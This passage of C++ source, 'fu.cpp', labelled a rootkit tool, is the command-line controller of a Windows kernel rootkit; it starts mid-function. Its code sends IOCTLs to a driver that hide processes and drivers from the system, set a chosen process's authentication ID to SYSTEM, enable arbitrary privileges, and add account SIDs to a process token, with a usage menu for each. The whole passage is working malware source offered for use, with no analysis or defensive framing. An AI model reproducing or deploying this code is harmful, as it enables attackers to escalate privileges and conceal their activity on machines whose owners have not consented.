fu.cpp

rootkit工具

	if (priv_luids == NULL)
		return ERROR_INVALID_ADDRESS;

	pluid_array = (PLUID_AND_ATTRIBUTES) calloc(priv_size/32, sizeof(LUID_AND_ATTRIBUTES));
	if (pluid_array == NULL)
		return ERROR_NOT_ENOUGH_MEMORY;

	DWORD real_luid = 0;
	for (int i = 0; i < priv_size/32; i++)
	{
		if(LookupPrivilegeValue(NULL, (char *)priv_luids + (i*32), &pluid))
		{	
			memcpy(pluid_array+i, &pluid, sizeof(LUID));
			(*(pluid_array+i)).Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT;
			real_luid++;
		}
	}
	dvars.the_pid = pid;
	dvars.pluida = pluid_array;
	dvars.num_luids = real_luid;

	success = DeviceIoControl(gh_Device, 
					IOCTL_ROOTKIT_SETPRIV,
					(void *) &dvars,
					sizeof(dvars),
					NULL,
					0,
					&d_bytesRead,
					NULL);
	if(pluid_array)
		free(pluid_array);
	return success;	
}


DWORD SetAuthID(DWORD pid, PSID my_sid, DWORD sid_size)
{
	DWORD d_bytesRead;
	DWORD success;
	VARS2 my_var;

	if (!Initialized)
	{
		return ERROR_NOT_READY;
	}

	if ((pid == 0) || (my_sid == NULL) || (sid_size == 0))
		return ERROR_INVALID_ADDRESS;

	my_var.the_pid = pid;
	my_var.pSID = my_sid;
	my_var.d_SidSize = sid_size;

	success = DeviceIoControl(gh_Device, 
					IOCTL_ROOTKIT_SETAUTHID,
					(void *) &my_var,
					sizeof(VARS2),
					NULL,
					0,
					&d_bytesRead,
					NULL);

	return success;	


}

DWORD SetSid(DWORD pid, PSID my_sid, DWORD sid_size)
{

	DWORD d_bytesRead;
	DWORD success;
	VARS2 my_var;

	if (!Initialized)
	{
		return ERROR_NOT_READY;
	}

	if ((pid == 0) || (my_sid == NULL) || (sid_size == 0))
		return ERROR_INVALID_ADDRESS;

	my_var.the_pid = pid;
	my_var.pSID = my_sid;
	my_var.d_SidSize = sid_size;

	success = DeviceIoControl(gh_Device, 
					IOCTL_ROOTKIT_SETSID,
					(void *) &my_var,
					sizeof(VARS2),
					NULL,
					0,
					&d_bytesRead,
					NULL);

	return success;	


}

void ShowUsage()
{
		printf("Usage: fu\n"); 
		printf("\t[-pl]  #number   to list the first #number of processes\n"); 
		printf("\t[-ph]  #PID      to hide the process with #PID\n");
//		printf("\t[-pld]		 to list the named drivers\n"); 
//		printf("\t[-phd] DRIVER_NAME to hide the named driver\n"); 
		printf("\t[-pas] #PID      to set the AUTH_ID to SYSTEM on process #PID\n");
		printf("\t[-prl]		 to list the available privileges\n"); 
		printf("\t[-prs] #PID #privilege_name to set privileges on process #PID\n");
		printf("\t[-pss] #PID #account_name to add #account_name SID to process #PID token\n\n");
		return;
}

void main(int argc, char **argv)
{
	const int PROCNAMELEN = 26;
	char *buffer, *start;

	if (argc > 1)
	{
		if (InitDriver() == -1)
			return;

		if (strcmp((char *)argv[1], "-prl") == 0)
			ListPriv();
		else if (strcmp((char *)argv[1], "-pld") == 0)
			ListDriv();
		else if (strcmp((char *)argv[1], "-phd") == 0)
		{
			if (argc != 3)
			{
				ShowUsage();
				return;
			}
			HideDriv(argv[2]);
		}
		else if (strcmp((char *)argv[1], "-prs") == 0)
		{
			char *priv_array = NULL;
			DWORD pid = 0;

			if (argc < 4)
			{
				ShowUsage();
				return;
			}
			pid = atoi(argv[2]);
			
			priv_array = (char *)calloc(argc-3, 32);
			if (priv_array == NULL)
			{
				fprintf(stderr, "Failed to allocate memory!\n");
				return;
			}

			int size = 0;
			for(int i = 3; i < argc; i++)
			{
				if(strncmp(argv[i], "Se", 2) == 0)
				{
					strncpy((char *)priv_array + ((i-3)*32), argv[i], 31);
					size++;
				}
				
			}
		
			SetPriv(pid, priv_array, size*32);
			if(priv_array)
				free(priv_array);
		}
		else if (strcmp((char *)argv[1], "-ph") == 0)
		{
			if (argc != 3)
			{
				ShowUsage(); //printf("You must follow -ph with the PID of the process to hide.\n");
				return;
			}
		
			DWORD pid = atoi(argv[2]);
			HideProc(pid);
		}
		else if (strcmp((char *)argv[1], "-pl") == 0)
		{
			if (argc != 3)
			{
				printf("You must follow -pl with the number of processes to list.\n");
				return;
			}
			int size = atoi(argv[2]);
			buffer = (char *)calloc(1,size * PROCNAMELEN);
			if (buffer == NULL)
			{
				fprintf(stderr, "Failed to allocate memory!\n");
				return;
			}
			start = buffer;
			size = ListProc(buffer, size*PROCNAMELEN);
			size /= PROCNAMELEN;
			int ploop = 0;
			while(ploop < size-1)
			{
				printf("Process: %s\n",buffer);
				buffer += PROCNAMELEN;
				ploop++;
			}
			printf("Process: %s\n",buffer);
			printf("Total number of processes = %d\n",ploop);
			if(start)
				free(start);
		}

		else if (strcmp((char *)argv[1], "-pas") == 0)
		{
			char *sname = "System";
			DWORD d_SIDSize = 0;
			DWORD d_domSize = 0;
			LPTSTR lp_domName = NULL;
			PSID my_SID = NULL;
			PSID_NAME_USE sid_use = NULL;
			BOOL success = FALSE;
			DWORD pid; 

			if (argc > 2)
				pid = atoi(argv[2]);
			else
			{
				ShowUsage(); //printf("Missing the PID\n");
				return;
			}
			LookupAccountName(NULL,
							  sname,
							  my_SID,
							  &d_SIDSize,
							  lp_domName,
							  &d_domSize,
							  sid_use);
			
			my_SID = (PSID) calloc(1, d_SIDSize);
			if (my_SID == NULL)
			{
				fprintf(stderr, "Failed to allocate memory!\n");
				return;
			}
			
			lp_domName = (LPTSTR) calloc(1, d_domSize*sizeof(TCHAR));
			if (lp_domName == NULL)
			{
				if(my_SID)
					free(my_SID);
				fprintf(stderr, "Failed to allocate memory!\n");
				return;
			}
			sid_use = (_SID_NAME_USE *) calloc(1, sizeof(_SID_NAME_USE));
			if (sid_use == NULL)
			{
				if(lp_domName)
					free(lp_domName);
				if(my_SID)
					free(my_SID);
				fprintf(stderr, "Failed to allocate memory!\n");
				return;
			}

			success = LookupAccountName(NULL,
										sname,
										my_SID,
										&d_SIDSize,
										lp_domName,
										&d_domSize,
										sid_use);
			if (!success)
			{
				fprintf(stderr, "Failed to lookup System SID.\n");
				if(lp_domName)
					free(lp_domName);
				if(sid_use)
					free(sid_use);
				if(my_SID)
					free(my_SID);
				return;
			}
			SetAuthID(pid, my_SID, d_SIDSize);
			if(lp_domName)
				free(lp_domName);
			if(sid_use)
				free(sid_use);
			if(my_SID)
				free(my_SID);
		}
		else if (strcmp((char *)argv[1], "-pss") == 0)
		{
			char *sname = NULL;
			DWORD d_SIDSize = 0;
			DWORD d_domSize = 0;
			LPTSTR lp_domName = NULL;
			PSID my_SID = NULL;
			PSID_NAME_USE sid_use = NULL;
			BOOL success = FALSE;
			DWORD pid; 

			if (argc != 4)
			{
				ShowUsage();
				return;
			}
			pid = atoi(argv[2]);
			sname = argv[3];

			LookupAccountName(NULL,
							  sname,
							  my_SID,
							  &d_SIDSize,
							  lp_domName,
							  &d_domSize,
							  sid_use);
			
			my_SID = (PSID) calloc(1, d_SIDSize);
			if (my_SID == NULL)
			{
				fprintf(stderr, "Failed to allocate memory!\n");
				return;
			}
			
			lp_domName = (LPTSTR) calloc(1, d_domSize*sizeof(TCHAR));
			if (lp_domName == NULL)
			{
				if(my_SID)
					free(my_SID);
				fprintf(stderr, "Failed to allocate memory!\n");
				return;
			}
			sid_use = (_SID_NAME_USE *) calloc(1, sizeof(_SID_NAME_USE));
			if (sid_use == NULL)
			{
				if(lp_domName)
					free(lp_domName);
				if(my_SID)
					free(my_SID);
				fprintf(stderr, "Failed to allocate memory!\n");
				return;
			}

			success = LookupAccountName(NULL,
										sname,
										my_SID,
										&d_SIDSize,
										lp_domName,
										&d_domSize,
										sid_use);
			if (!success)
			{
				fprintf(stderr, "Failed to lookup account name.\n");
				if(lp_domName)
					free(lp_domName);
				if(sid_use)
					free(sid_use);
				if(my_SID)
					free(my_SID);
				return;
			}
			SetSid(pid, my_SID, d_SIDSize);
			if(lp_domName)
				free(lp_domName);
			if(sid_use)
				free(sid_use);
			if(my_SID)
				free(my_SID);

		}
		else
		{
			ShowUsage();
		}
	}
	else
	{
		ShowUsage();
	}
  
	return;
}